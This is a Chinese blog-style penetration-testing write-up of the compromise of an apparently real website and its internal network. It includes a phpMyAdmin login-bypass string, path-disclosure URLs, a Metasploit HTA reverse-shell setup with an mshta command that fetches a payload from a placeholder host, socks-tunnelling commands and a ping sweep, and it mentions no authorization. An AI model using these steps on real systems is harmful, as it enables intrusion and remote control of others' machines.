观众老爷们好啊 给大家表演个基本操作

• 本文适合正在学习入门的小伙伴 师傅们就不必踏雪我了
• 第一次写文章有点细(生怕写的不好,却是也是烂)中间介绍了插件工具等 可能会看一阵子 麻烦您了
  多采用各种骚词(真实的内心反映) 皆是为了带动积极性希望入门的朋友把渗透当作有趣的事情来思考，抛弃枯燥乏味的感觉，冒昧之处还请多多包涵。

外网

信息收集怎么说呢 肯定是越全面越好 但找到突破口了 就不想去收集其他了 反之如果没找到合适的突破口那可能是收集不够全

• 感觉这网站（https://scan.top15.cn/web/ ）
  使其还不错功能挺全 查到的东西也多点 这不phpmyadmin就把头伸过来了
  

• 接着看 基本信息还是有必要了解下
  工具这东西吧 好是好就是不够准确 妈蛋 Linux 都冒出来了
  (判断网站操作系统 最快捷的就是大小写 Windows对网址中的大小写不敏感 Linux则反之)

• 火狐插件 判断不迷路
  

• 火狐插件 傻蛋也是几款网络搜索中的老大哥了
  

• 好奇心使我注意到443端口 渗透就想巧克力 永远不知道下一步是啥样儿的
  手工尝试了 简单弱口令 不行就先放着
  后面可以尝试 爆破 注入 等等
  

• 回到正文来 之前网站识别出来的 phpmyadmin 头还伸着呢
  

• 得知版本2.10.3 第一件事就是百度 有问题多问度娘不行就谷哥 有万能密码() 试试就试试
  

• 不清楚10.3版本也可以利用该漏洞（也可以尝试爆破）
  ‘localhost’@'@”
  

• 口令在手 shell我有
  

  那么问题来了 绝对路径怎么找 首先尝试以下url
  phpMyAdmin/libraries/select_lang.lib.php
  phpMyAdmin/darkblue_orange/layout.inc.php
  phpMyAdmin/index.php?lang[]=1
  phpmyadmin/themes/darkblue_orange/layout.inc.php

• 还有其他方法 比如info
  有就更好 没有首先会尝试 谷歌语法了
  火狐插件 SetupVPN 挺好用的 免费的 注册就能用 偶尔上个google 挺方便的
  

三种常见搜索引擎

• 还有种方式 就是用谷歌镜像 也还行 毕竟浏览器挂的vpn访问是真的慢
  

• 现在万事俱备只差马儿
  

• 刚开始蚂剑执行命令是有回显的 第二天执行就没了 让朋友看了下disable_functions什么情况 为什么要为难我
  

• 接着重新写马 试试能不能执行系统命令结果可以啊 菜刀也能执行命令 只不过变成这样回显 顶！(如果有了解情况的师傅 麻烦告知 感激不尽)
  
• But 虽然没了 回显但还是能执行命令。。。
  
• Getshell过程没什么操作难度(太难的也操作不出来)主要是记录成长过程以及对刚入门朋友描述下大概思路

内网

注意服务器改端口 防止 全网爆破流 然后用scerro 挂起后台运行避免ssh断了 cs清空
服务器用的是 阿里云学生机(一年也就一百来块)还是挺不错的

佳哥让试试msf 可能是我的cs有问题

• msf生成hta

  use exploit/windows/misc/hta_server
  set payload windows/meterpreter/reverse_tcp
  set lhost xx.xx.xx.xx
  set lport 6666

  执行 mshta.exe http://xx.xx.xx.xx/pKz4Kk059Nq9.hta
  

• 查找了下域控ip 192.168.30.61
  

• 这里存活ip检测不够准确(后面cs扫还有给.11主机)
  

• 这里 还打过ms17_010无果 忘了截图了--------------
  Msf好久没用 不知道感觉用些什么了 还是上cs把 直观点 msf可以转发到cs
  但那操作还不如我直接上cs来的快(说白了 就是懒)

第二天带着疯狂掉线疑问 问了前辈 告知是由于破解没完全 发了个破解完全了版本 重新拉起

• 到内网 先看是否是域环境 接下来顺序
  提权>毕竟很多命令或者程序需要高权限能省不少麻烦(这里已经最高权限)
  横向渗透>扩展姿势(ms17_010、口令碰撞、哈希传递、内网web、弱口令其实也就是信息收集过程
  拿下域控>毕竟域控才是王道

• systeminfo 能看到很多本机信息
  收集到的信息为 域环境 虚拟机 2012服务器等 补丁虽然很全 但上来就是最高权限 舒服了
  
  
  

• 在域内却执行不了 域命令 真是什么奇葩环境都被我遇到了
  平时看师傅们文章也没见过这些问题 还是要自己动手才晓得长记性

• 接着了解到 是域机器但不是域会话 说白了 就是没域用户 现在这个用户是本地最高权限
  那还说啥 查看进程 把会话注入到有域用户上
  还有种方式 就通过抓取到的口令 用make_token仿冒域用户
  

• 这真不清楚了 去他妈的 好惨一男的
  

• 后来发现自己一开始就错了 一开始看到systeminfo写的域 以为有域 毕竟长的太像了！！！
  结果自己本机测试 工作组可以修改名字然后systeminfo就会出现类似于域名 例如
  哎 这该死的名字！ 之前还坐了一顿傻逼操作 秀到自己了 还以为是域控关机下线或者迁移了(域内所有主机域用户或者命令都要经过域控执行)
  

But也不对啊 如果是工作组 域都是大写 他是怎么办到小写的

再者 前面用Msf都能看到域控Ip 难道误报？？？

• 这里不是有口令嘛 3389上去看看 这么神奇的玩意儿 到底啥样儿
  cs 自带sock4
  通过cs 建立sock4代理 加上 windows下面 proxifier

  ew(frp也可以但感觉用起没ew顺手)
  目标: shell ew_win32.exe -s rssocks -d x.x.x.x. -e 1024
  公网ip: ./ew_linux_x64 -s rcsocks -l 1024 -e 1080 &
  再用proxifier 连接

  还有就是msfconsole 也自带端口转发
  cs的端口也带转发 不成功 不清楚原因 说无法绑定
  

• 上去看了一眼啥都没 空空荡荡 也没什么可翻找的 就退了 毕竟 用的sock4 慢点一逼

推荐 cs插件脚本 感觉挺全的挑着顺手的用还是有必要的（https://www.codercto.com/a/57741.html ）

不管了 这里就当是工作组环境

• 工作组 无非就是撞口令、永恒之蓝、搞WEB 不让用域命令 我扫可以趴 反正就是得搞你
  横向准备工作

• 存活ip
  循环ping 查找存活ip 不用上传 cmd 执行
  for /l %i in (1,1,255) do @ ping 192.168.124.%i -w 1 -n 1|find /i "ttl="
  nbtscan 扫描内网存活ip 及目标所属(看到域了) 大家都在用 上面脚本中有个一键上传的脚本
  
  

• 端口开放 浏览器代理访问 看看是些什么东东
  

写在最后

• 文笔垃圾、措辞轻浮、内容尚浅、操作生疏、不足之处还求多多包涵和指正，感激不尽
  感谢给予帮助的繁星、Zed、以及白帽100少先队里面个个都是人才说话又好听，最后谢谢你
  这是一次失败的渗透、但也是很好的开始
  安全你我他 请勿复现！